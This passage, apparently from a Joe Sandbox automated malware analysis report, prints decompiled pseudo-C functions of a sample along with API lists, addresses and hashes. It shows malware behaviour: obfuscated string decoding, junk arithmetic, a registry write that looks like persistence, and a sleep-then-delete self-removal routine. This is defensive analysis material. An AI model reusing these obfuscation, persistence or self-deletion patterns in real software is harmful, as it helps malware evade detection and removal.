					_t67 =  *0xfae028; // 0x781e
					_v12 = _t134;
					_t110 = _t28;
					_t68 =  *0xfae24c; // 0x97715537
					_v16 = 0x60938709 - _t67 - _t68;
					asm("fild dword [ebp-0xc]");
					asm("fsubr qword [ebp-0x8]");
					 *0xfae074 = _t134;
					 *0xfae028 =  *0xfae028 + 1;
					_t88 = E00F76680(_t134) & 3;
					if(_t88 < 0) {
						_t88 = (_t88 - 0x00000001 | 0xfffffffc) + 1;
					}
					E00F71BC0(_t115 + _t110 - 0x124, _t88 + 7);
					_t35 = E00F6CF90(_t88 + 7, _t134, 0x1611, 5);
					_t64 = _t35;
					_t69 = _t35;
					do {
						_t90 =  *_t35;
						_t35 = _t35 + 1;
					} while (_t90 != 0);
					_t36 = _t35 - _t69;
					_t111 = _t69;
					_t101 =  &_v296 - 1;
					do {
						_t70 =  *(_t101 + 1);
						_t101 = _t101 + 1;
						_t131 = _t70;
					} while (_t70 != 0);
					_t72 = _t36 >> 2;
					memcpy(_t111 + _t72 + _t72, _t111, memcpy(_t101, _t111, _t72 << 2) & 0x00000003);
					_t39 = E00F6CF90(_t131, _t134, 0x29a1, 3);
					E00F76570(5, _t64);
					_t112 = E00F7D699( &_v296, _t39);
					_t42 = E00F76570(3, _t39);
					_t132 = _t112;
					if(_t112 != 0) {
						_push(_t112);
						_push(1);
						_push(E00F6CEE0(_t42));
						_push(E00F71FC0(_t43, _a4));
						E00F7DBE8(_t64, _t90, _a4, _t112, _t132);
						_push(_t112);
						E00F7DA1D(_t64, _t90, _a4, _t112, _t132);
						E00F6CB90(_a4, _t132);
						_v300 = 0;
						GetModuleFileNameA(0,  &_v560, 0x104);
						asm("fld1");
						asm("faddp st1, st0");
						_v12 =  *0xfae134;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0xfae3a0;
						 *0xfae0f4 =  *0xfae0f4 + _v12;
						_v561 = 0;
						 *0xfae3a0 =  *0xfae3a0 +  *0xfa75c8;
						_t49 = E00F6CF90(_t132,  *0xfae3a0 +  *0xfa75c8, 0x1618, 0x15);
						 *0xfae478 =  *0xfae478 - 1;
						_t114 = _t49;
						_t50 =  *0xfae478; // 0x8f288571
						_t81 =  *0xfb04b0; // 0x2731180
						_t92 =  *0xfb050c; // 0x2731058
						_push(_t81);
						_push(_t92);
						 *0xfae398 = _t50 + 0x3953da14;
						E00F7E0C2( &_v1080, 0x207, _t49,  &_v560);
						 *0xfae2d8 =  *0xfae2d8 + 1;
						_t93 =  *0xfae31c; // 0xd3bc
						_t83 =  *0xfae2d8; // 0xaffc
						if(_t83 == _t93 + 0x94bbc7e8) {
							 *0xfae098 =  *0xfae160 *  *0xfae098;
						}
						E00F76570(0x15, _t114);
						_t57 =  *0xfb04b0; // 0x2731180
						E00F696D0(_t114, _t57);
						 *0xfae0b4 =  *0xfae0b4 -  *0xfa7db0;
						E00F66260( *0xfae0b4 -  *0xfa7db0,  &_v296,  &_v1080);
						E00F7C990( &_v1080, 0, 0x208);
						E00F7C990( &_v560, 0, 0x105);
						Sleep(0x15f90);
						_t42 = DeleteFileA( &_v296);
					}
					return _t42;
				}
				return _t26;
			}

0x00f75a0c
0x00f75a16
0x00f75a26
0x00f75a2b
0x00f75a31
0x00f75a38
0x00f75a3b
0x00f75a40
0x00f75a4f
0x00f75a52
0x00f75a55
0x00f75a58
0x00f75a5e
0x00f75a6d
0x00f75a73
0x00f75a79
0x00f75a79
0x00f75a86
0x00f75a92
0x00f75a9a
0x00f75a9c
0x00f75aa0
0x00f75aa0
0x00f75aa2
0x00f75aa3
0x00f75aad
0x00f75aaf
0x00f75ab1
0x00f75ab2
0x00f75ab2
0x00f75ab5
0x00f75ab6
0x00f75ab6
0x00f75abc
0x00f75acd
0x00f75acf
0x00f75ad9
0x00f75aee
0x00f75af0
0x00f75af8
0x00f75afa
0x00f75b03
0x00f75b04
0x00f75b0d
0x00f75b15
0x00f75b16
0x00f75b1b
0x00f75b1c
0x00f75b26
0x00f75b39
0x00f75b40
0x00f75b4c
0x00f75b50
0x00f75b63
0x00f75b6c
0x00f75b6f
0x00f75b7b
0x00f75b87
0x00f75b94
0x00f75b9a
0x00f75b9f
0x00f75ba5
0x00f75ba7
0x00f75bac
0x00f75bb2
0x00f75bb8
0x00f75bbe
0x00f75bbf
0x00f75bd9
0x00f75bde
0x00f75be5
0x00f75bec
0x00f75c03
0x00f75c11
0x00f75c11
0x00f75c1a
0x00f75c1f
0x00f75c25
0x00f75c44
0x00f75c4a
0x00f75c5d
0x00f75c70
0x00f75c7d
0x00f75c8a
0x00f75c8a
0x00000000
0x00f75c92
0x00f75c96

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00F75B40
__snprintf.LIBCMT ref: 00F75BD9
_memset.LIBCMT ref: 00F75C5D
_memset.LIBCMT ref: 00F75C70
Sleep.KERNEL32(00015F90), ref: 00F75C7D
DeleteFileA.KERNEL32(?), ref: 00F75C8A

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: File_memset$DeleteModuleNameSleep__snprintf
String ID:
API String ID: 4186849704-0
Opcode ID: b1682391f84f459c29fe708306bbda1ae8f6b6a3002ceceab71b6307b41790cd
Instruction ID: 4f5e8e64884df0e46dd72493ed05e60682b441b7c199cee50e5fe4a4f51ce4ea
Opcode Fuzzy Hash: b1682391f84f459c29fe708306bbda1ae8f6b6a3002ceceab71b6307b41790cd
Instruction Fuzzy Hash: E65150B190071CEBDB10EB70EC85BEE3BB9EB8D710F008195F58897195DB745550EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F901D0 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00F901D0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xfabe98);
				E00F829D0(__ebx, __edi, __esi);
				_t31 = E00F7FFF2(__ebx, __edi, _t35);
				_t15 =  *0xfaf2b0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00F827E5(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xfaf1b8; // 0x2731608
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xfaed90;
								if(__eflags != 0) {
									E00F7CB4B(_t33);
								}
							}
						}
						_t21 =  *0xfaf1b8; // 0x2731608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xfaf1b8; // 0x2731608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00F9026B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00F7DFAC(_t29, _t31, _t33, _t38);
				}
				return E00F82A15(_t33);
			}

0x00f901d0
0x00f901d0
0x00f901d0
0x00f901d0
0x00f901d2
0x00f901d7
0x00f901e1
0x00f901e3
0x00f901eb
0x00f9020c
0x00f90212
0x00f90216
0x00f90219
0x00f9021c
0x00f90222
0x00f90224
0x00f90226
0x00f9022f
0x00f90231
0x00f90233
0x00f90239
0x00f9023c
0x00f90241
0x00f90239
0x00f90231
0x00f90242
0x00f90247
0x00f9024a
0x00f90250
0x00f90254
0x00f90254
0x00f9025a
0x00f90261
0x00f901f3
0x00f901f3
0x00f901f3
0x00f901f6
0x00f901f8
0x00f901fa
0x00f901fc
0x00f90201
0x00f90209

APIs

__getptd.LIBCMT ref: 00F901DC

Part of subcall function 00F7FFF2: __getptd_noexit.LIBCMT ref: 00F7FFF5
Part of subcall function 00F7FFF2: __amsg_exit.LIBCMT ref: 00F80002

__amsg_exit.LIBCMT ref: 00F901FC
__lock.LIBCMT ref: 00F9020C
InterlockedDecrement.KERNEL32(?), ref: 00F90229
_free.LIBCMT ref: 00F9023C
InterlockedIncrement.KERNEL32(02731608), ref: 00F90254

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: f72339a17bd21749e6312ab72d78bd3ea8b7328f5216ed12f355a01ce32ef732
Instruction ID: 77b754851beaea4b84c552f46ab7a2fce4539f18221c0b8582336b753a557bbf
Opcode Fuzzy Hash: f72339a17bd21749e6312ab72d78bd3ea8b7328f5216ed12f355a01ce32ef732
Instruction Fuzzy Hash: 5601A172D00615DFEB21AB559C4A78DB770AF46B30F404016F81467291CF386D46FBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00F66A90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130
registryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00F66A90(char* _a4) {
				void* _v8;
				signed char _v12;
				long long _v16;
				long long _v24;
				intOrPtr _t23;
				signed char _t25;
				long _t28;
				signed char _t30;
				char* _t35;
				short _t38;
				char _t42;
				char* _t43;
				short _t46;
				char* _t47;
				void* _t50;
				char* _t56;
				intOrPtr _t67;
				long long _t69;
				intOrPtr _t71;
				intOrPtr _t76;

				 *0xfae268 =  *0xfae268 + 1;
				_t23 =  *0xfae268; // 0xd18b
				_t38 =  *0xfae49c; // 0x3b0d
				_t25 = _t38 - _t23 - 0x3418d07c;
				 *0xfae29c =  *0xfae29c + _t25;
				 *0xfae49c =  *0xfae49c - 1;
				_t50 = 0x80000002;
				if( *0xfb030c == 0) {
					_t50 = 0x80000001;
					asm("fld1");
					asm("fsubp st2, st0");
					asm("fxch st0, st1");
					 *0xfae168 = st0;
					_v16 =  *0xfae168;
					_t67 =  *0xfae068 + _v16 -  *0xfa7a88;
					asm("fcomp qword [0xfa7a80]");
					asm("fnstsw ax");
					_t62 = _t25 & 0x00000005;
					if((_t25 & 0x00000005) != 0) {
						st0 = _t67;
					} else {
						_v16 =  *0xfae500 -  *0xfa7a78;
						_v16 =  *0xfae248 + _v16;
						_t67 =  *0xfae5e0 + _v16;
						 *0xfae5e0 = _t67;
						asm("fsubr dword [0xfae248]");
						 *0xfae248 = _t67;
					}
				}
				_t28 = RegOpenKeyA(_t50, E00F6CF90(_t62, _t67, 0x3158, 0x2e),  &_v8);
				E00F76570(0x2e, _t26);
				if(_t28 != 0) {
					L8:
					asm("fld1");
					_t69 =  *0xfae480 - st0;
					asm("fxch st0, st1");
					 *0xfae480 = _t69;
					_t30 =  *0xfae4f4; // 0x1c86
					_v12 = _t30;
					asm("fild dword [ebp-0x8]");
					_v16 = _t69;
					 *0xfae4f4 =  *0xfae4f4 + 1;
					asm("fsubr qword [ebp-0xc]");
					_t71 =  *0xfae480 -  *0xfa7a70;
					asm("fcomp qword [0xfa7a68]");
					asm("fnstsw ax");
					if((_t30 & 0x00000005) != 0) {
						st0 = _t71;
						return RegCloseKey(_v8);
					} else {
						_t46 =  *0xfae508; // 0x0
						_v12 = _t46;
						_v24 =  *0xfae148 -  *0xfae054 -  *0xfa7a60;
						asm("fild dword [ebp-0x8]");
						 *0xfae508 = E00F7CABC();
						_t76 =  *0xfae054;
						asm("fld1");
						asm("fsubp st1, st0");
						 *0xfae054 = _t76;
						 *0xfae148 = _t76 +  *0xfae148;
						return RegCloseKey(_v8);
					}
				}
				_t47 = _a4;
				_t35 = _t47;
				_t12 =  &(_t35[1]); // 0xf63cf8
				_t56 = _t12;
				do {
					_t42 =  *_t35;
					_t35 =  &(_t35[1]);
				} while (_t42 != 0);
				_t43 =  *0xfb04b8; // 0x2731100
				RegSetValueExA(_v8, _t43, 0, 1, _t47, _t35 - _t56);
				goto L8;
			}

0x00f66a93
0x00f66a9a
0x00f66aa0
0x00f66ab0
0x00f66ab6
0x00f66abc
0x00f66acc
0x00f66ad1
0x00f66ad9
0x00f66ade
0x00f66ae2
0x00f66ae4
0x00f66ae6
0x00f66af2
0x00f66afe
0x00f66b04
0x00f66b0a
0x00f66b0c
0x00f66b0f
0x00f66b49
0x00f66b11
0x00f66b1d
0x00f66b29
0x00f66b32
0x00f66b35
0x00f66b3b
0x00f66b41
0x00f66b41
0x00f66b0f
0x00f66b62
0x00f66b6d
0x00f66b77
0x00f66ba1
0x00f66ba8
0x00f66bab
0x00f66bad
0x00f66baf
0x00f66bb5
0x00f66bbe
0x00f66bc1
0x00f66bc4
0x00f66bcd
0x00f66bd4
0x00f66bd7
0x00f66bdd
0x00f66be3
0x00f66be8
0x00f66c4a
0x00f66c56
0x00f66bea
0x00f66bf6
0x00f66c00
0x00f66c09
0x00f66c0c
0x00f66c17
0x00f66c1d
0x00f66c23
0x00f66c25
0x00f66c27
0x00f66c37
0x00f66c46
0x00f66c46
0x00f66be8
0x00f66b79
0x00f66b7c
0x00f66b7e
0x00f66b7e
0x00f66b81
0x00f66b81
0x00f66b83
0x00f66b84
0x00f66b88
0x00f66b9b
0x00000000

APIs

RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 00F66B62
RegSetValueExA.ADVAPI32(?,02731100,00000000,00000001,00F63CF7,00F63CF8,?,?,?,?,?,?,?,00F63CF7,?), ref: 00F66B9B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00F63CF7,?), ref: 00F66C3D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00F63CF7,?), ref: 00F66C4D

Strings

d#LP, xrefs: 00F66C27

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Close$OpenValue
String ID: d#LP
API String ID: 3951040859-2561414668
Opcode ID: 3868883126fec7eaba9be2a3f1bc2d9d63b7e60892848f9e2a3081b9fad77b83
Instruction ID: 07a1bff1741934b02f6ba7c32389354432480e6c0e0079ce421120ce6dd563d6
Opcode Fuzzy Hash: 3868883126fec7eaba9be2a3f1bc2d9d63b7e60892848f9e2a3081b9fad77b83
Instruction Fuzzy Hash: 8541F5F5D0060CEBDB04AF60FD8D6AA7FB8FB86311F258185E881A2274EB350565FB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F9C1A2 Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00F9C1A2(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0xfb09e0, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0xfb1014 - _t7;
								if(__eflags == 0) {
									_t9 = E00F7FA66(__eflags);
									 *_t9 = E00F7FA24(GetLastError());
									goto L17;
								} else {
									__eflags = E00F7FDDD(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00F7FA66(__eflags);
										 *_t12 = E00F7FA24(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00F7FDDD(_t6, _t30);
						 *((intOrPtr*)(E00F7FA66(__eflags))) = 0xc;
						goto L12;
					} else {
						E00F7CB4B(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00F7CBC4(__edx, __edi, __esi, _a8);
				}
			}

0x00f9c1ab
0x00f9c1b8
0x00f9c1b9
0x00f9c1bc
0x00f9c1be
0x00f9c1cd
0x00f9c200
0x00f9c200
0x00f9c203
0x00000000
0x00000000
0x00f9c1d0
0x00f9c1d2
0x00f9c1d4
0x00f9c1d4
0x00f9c1d4
0x00f9c1e1
0x00f9c1e7
0x00f9c1e9
0x00f9c1eb
0x00f9c24b
0x00f9c24b
0x00f9c1ed
0x00f9c1ed
0x00f9c1f3
0x00f9c235
0x00f9c249
0x00000000
0x00f9c1f5
0x00f9c1fc
0x00f9c1fe
0x00f9c21d
0x00f9c231
0x00f9c217
0x00f9c217
0x00f9c217
0x00000000
0x00000000
0x00000000
0x00f9c1fe
0x00f9c1f3
0x00000000
0x00f9c219
0x00f9c206
0x00f9c211
0x00000000
0x00f9c1c0
0x00f9c1c3
0x00f9c1c9
0x00f9c1c9
0x00f9c21a
0x00f9c21c
0x00f9c1ad
0x00f9c1b7
0x00f9c1b7

APIs

_malloc.LIBCMT ref: 00F9C1B0

Part of subcall function 00F7CBC4: __FF_MSGBANNER.LIBCMT ref: 00F7CBDD
Part of subcall function 00F7CBC4: __NMSG_WRITE.LIBCMT ref: 00F7CBE4
Part of subcall function 00F7CBC4: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00F91B2D,00000000,00000001,00000000,?,00F82770,00000018,00FABCE0,0000000C,00F82800), ref: 00F7CC09

_free.LIBCMT ref: 00F9C1C3

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8885255917c5ed0626133cdd3990a06d7049a8477994c0e5e644eb9ba22b8692
Instruction ID: 987fccb190bfd4d4b92f1eb660e8d3393dec9378275579342fb54c81e9e10ffc
Opcode Fuzzy Hash: 8885255917c5ed0626133cdd3990a06d7049a8477994c0e5e644eb9ba22b8692
Instruction Fuzzy Hash: 1811E733844515ABFF316BB4AC05A593795AB81BB0F218137F90CCA151EB38CD80BBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00F9098F Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00F9098F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0xfabed8);
				E00F829D0(__ebx, __edi, __esi);
				_t28 = E00F7FFF2(__ebx, __edi, _t31);
				_t12 =  *0xfaf2b0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00F827E5(_t20, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00F90942(_t29,  *0xfaf4f8);
					 *(_t30 - 4) = 0xfffffffe;
					E00F909FC();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00F7FFF2(_t20, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00F7DFAC(_t25, _t26, _t29, _t34);
				}
				return E00F82A15(_t29);
			}

0x00f9098f
0x00f9098f
0x00f9098f
0x00f9098f
0x00f9098f
0x00f90991
0x00f90996
0x00f909a0
0x00f909a2
0x00f909aa
0x00f909ce
0x00f909d0
0x00f909d6
0x00f909e0
0x00f909eb
0x00f909ee
0x00f909f5
0x00f909ac
0x00f909ac
0x00f909b0
0x00000000
0x00f909b2
0x00f909b7
0x00f909b7
0x00f909b0
0x00f909ba
0x00f909bc
0x00f909be
0x00f909c0
0x00f909c5
0x00f909cd

APIs

__getptd.LIBCMT ref: 00F9099B

Part of subcall function 00F7FFF2: __getptd_noexit.LIBCMT ref: 00F7FFF5
Part of subcall function 00F7FFF2: __amsg_exit.LIBCMT ref: 00F80002

__getptd.LIBCMT ref: 00F909B2
__amsg_exit.LIBCMT ref: 00F909C0
__lock.LIBCMT ref: 00F909D0
__updatetlocinfoEx_nolock.LIBCMT ref: 00F909E4

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2a662febf7fe1830d7fa3e224cae8e6ce29e6aa7dd5a7d3f5747559a423516cc
Instruction ID: e379af1eaf99bf8b25f42f2ccf18a83d1bcecaf64462138051ea3ec3e285400f
Opcode Fuzzy Hash: 2a662febf7fe1830d7fa3e224cae8e6ce29e6aa7dd5a7d3f5747559a423516cc
Instruction Fuzzy Hash: 6AF06D72D05724AEFB21BB689C0278932A06F01730F20825AF419AB2D3CF6C5840BA56

Uniqueness

Uniqueness Score: -1.00%

Function 00F6E1D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 243
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00F6E1D0(void* __ebx, void* __edi, void* __eflags, signed char __fp0) {
				signed char _v8;
				long long _v12;
				long long _v20;
				char _v48;
				char _v76;
				long long _v84;
				char _v112;
				char _v140;
				char _v141;
				char _v396;
				char _v652;
				void* __esi;
				short _t55;
				void* _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				signed char _t71;
				void* _t76;
				signed char _t83;
				void* _t91;
				void* _t105;
				intOrPtr _t106;
				signed char _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				intOrPtr _t129;
				signed char _t134;
				intOrPtr _t135;
				intOrPtr _t137;
				signed char _t140;
				void* _t160;
				long long _t181;
				intOrPtr _t190;

				_t160 = __eflags;
				_t143 = __edi;
				_t105 = __ebx;
				_t55 =  *0xfae4a8; // 0x0
				_t106 =  *0xfae0e0; // 0xd349f564
				_t135 =  *0xfae1d0; // 0x2f751c98
				_t2 = _t55 - _t106 + 0x9b8b08e; // 0x392dcd26
				 *0xfae1d0 = _t135 + _t2;
				 *0xfae4a8 =  *0xfae4a8 - 1;
				 *0xfae0e0 =  *0xfae0e0 - 1;
				E00F75380( &_v48, __edi);
				E00F75380( &_v112, __edi);
				_t109 =  *0xfae230; // 0xeabf
				_v8 = _t109;
				asm("fild dword [ebp-0x4]");
				_v8 = __fp0;
				 *0xfae230 = E00F7CABC();
				asm("fld1");
				asm("faddp st1, st0");
				_v141 = 0;
				_t62 = E00F6CF90(_t160,  *0xfae0b0, 0x3fc1, 0x20);
				_t110 =  *0xfb04ec; // 0x1
				_t137 =  *0xfb0770; // 0x2
				_t63 =  *0xfb0744; // 0x1
				_push(_t63);
				_t64 =  *0xfb076c; // 0x6
				_push(_t110);
				_push(_t137);
				E00F7E0C2( &_v396, 0xff, _t62, _t64);
				E00F76570(0x20, _t62);
				E00F70980( &_v48,  *0xfae0b0,  &_v396);
				E00F7C990( &_v396, 0, 0x100);
				_v12 =  *0xfae190;
				asm("fsubr qword [ebp-0x8]");
				 *0xfae190 =  *0xfae3b0 -  *0xfa8090;
				asm("fld1");
				asm("fsubp st1, st0");
				E00F70980( &_v48,  *0xfae3b0, "C:\\Users\\hardz");
				_t71 = E00F6AF70(0xd);
				asm("fsubr qword [0xfa8088]");
				_t173 =  *0xfa8080;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t71 & 0x00000044) == 0) {
					_t173 =  *0xfa8078;
					asm("fucompp");
					asm("fnstsw ax");
					_t162 = _t71 & 0x00000044;
					if((_t71 & 0x00000044) == 0) {
						asm("fld1");
						asm("fsubp st2, st0");
						asm("fxch st0, st1");
						 *0xfae324 = st0;
						_v20 =  *0xfae388;
						_v12 =  *0xfae1e4;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0xfae1a8;
						_t190 =  *0xfae324;
						asm("fsubr qword [ebp-0x8]");
						asm("fsubr qword [ebp-0x10]");
						 *0xfae388 = _t190;
						_t173 = _t190 +  *0xfae1e4;
						 *0xfae1e4 = _t190 +  *0xfae1e4;
					}
				}
				E00F6AF70(0xa);
				E00F79F60(_t173,  &_v48);
				 *0xfae5e4 = 0xcefce338;
				E00F706A0(_t143,  &_v48);
				_t76 = E00F6FFA0( &_v48);
				E00F6A070(L00F75200( &_v48), _t77, _t76, 1,  &_v112);
				E00F72290(_t162,  &_v48);
				E00F69630( &_v76);
				_t146 = E00F6CF90(_t162, _t173, 0x3ddc, 0x10);
				E00F78260( &_v76, _t173, _t81);
				 *0xfae408 =  *0xfae408 - 1;
				_v20 =  *0xfae548 +  *0xfa8070;
				_t140 =  *0xfae408; // 0x0
				_t83 = _t140;
				_v8 = _t83;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				_t177 = _v20;
				asm("fucompp");
				asm("fnstsw ax");
				_t163 = _t83 & 0x00000044;
				if((_t83 & 0x00000044) == 0) {
					_t181 =  *0xfae25c;
					_t134 =  *0xfae01c; // 0x9b827a58
					_v84 = _t181;
					_v8 = _t134;
					asm("fild dword [ebp-0x4]");
					_v20 = _t181;
					_t177 =  *0xfae3b4 + _v20 +  *0xfa8068;
					asm("fsubr qword [ebp-0x50]");
					 *0xfae25c =  *0xfae3b4 + _v20 +  *0xfa8068;
				}
				E00F76570(0x10, _t146);
				_t122 =  *0xfafc34; // 0x2731230
				E00F7B1F0( &_v76, _t177, E00F6DE60(_t105, _t122, _t163,  &_v140));
				E00F73030( &_v140, _t143, _t146);
				E00F64780( &_v76, E00F6CF90(_t163, _t177, 0xfbd, 7));
				E00F76570(7, _t88);
				_t91 = E00F6FFA0( &_v112);
				E00F70A30( &_v76, L00F75200( &_v112), _t91);
				E00F72290(_t163,  &_v112);
				_t129 =  *0xfb0288; // 0x0
				E00F6D540(_t105, _t177,  &_v652, _t129);
				asm("fsubp st1, st0");
				 *0xfae160 =  *0xfae2f0 -  *0xfa8060;
				_t148 = E00F6CF90(_t163,  *0xfae2f0 -  *0xfa8060, 0x1446, 0xb);
				E00F792C0( &_v652, _t97,  *0xfae2f0 -  *0xfa8060,  &_v652, _t97,  &_v76, 0);
				E00F76570(0xb, _t97);
				E00F73030( &_v76, _t143, _t148);
				E00F79F50();
				E00F79F50();
				return 1;
			}

0x00f6e1d0
0x00f6e1d0
0x00f6e1d0
0x00f6e1d9
0x00f6e1df
0x00f6e1e5
0x00f6e1ee
0x00f6e1f5
0x00f6e1fa
0x00f6e201
0x00f6e20b
0x00f6e213
0x00f6e218
0x00f6e222
0x00f6e225
0x00f6e228
0x00f6e239
0x00f6e245
0x00f6e249
0x00f6e250
0x00f6e25d
0x00f6e262
0x00f6e268
